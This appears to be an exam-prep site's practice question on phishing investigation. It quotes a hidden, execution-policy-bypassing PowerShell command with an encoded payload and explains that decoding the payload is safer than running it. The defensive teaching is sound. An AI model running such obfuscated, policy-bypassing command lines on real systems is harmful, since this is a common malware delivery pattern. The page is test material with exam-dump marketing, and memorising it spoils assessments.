Great News!
Many students who study using our platform have reported that a large number of the practice questions here are very similar to those that appear in real exams. View Courses
Many students who study using our platform have reported that a large number of the practice questions here are very similar to those that appear in real exams. View Courses
An analyst is investigating a phishing incident and has retrieved the following as part of the investigation:
cmd.exe /c c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -
EncodedCommand
Which of the following should the analyst use to gather more information about the purpose of this command?
The correct answer is A. Echo the command payload content into ‘base64 -d’.
The EncodedCommand parameter in the PowerShell command indicates that the actual command being executed is base64-encoded. To understand the true purpose of the command, you would need to decode the base64-encoded payload.
By echoing the encoded content into base64 -d, you can decode it into a human-readable PowerShell command or script, which will provide clarity on what the command is actually doing. This step is necessary because the encoded content is typically obfuscated to avoid detection and analysis.
Why the others are incorrect:
Execute the command from a Windows VM: Running the command directly from a VM could be dangerous. Since the command may execute malicious activities (such as downloading further payloads or making system changes), it's better to decode the command first in a safe manner (e.g., using base64 -d) before executing it, to avoid unnecessary risks.
Use a command console with administrator privileges to execute the code: Executing the code with administrator privileges is highly risky, especially in an investigation context. The command could perform destructive or malicious actions, and doing so with elevated privileges could make the situation worse. The focus should be on decoding the command first, not executing it blindly.
Run the command as an unprivileged user from the analyst workstation: Running the command on the analyst's workstation is also risky and could trigger malicious behavior. It’s much safer to decode the payload first before considering any execution.
No Payment Cards Needed
Discover a range of courses designed to provide you with the knowledge and skills needed to excel in your chosen field.
You don’t need one month to study and pass your test.
With Prepsaret, it takes you a few days to grasp all the concepts needed to pass your exams
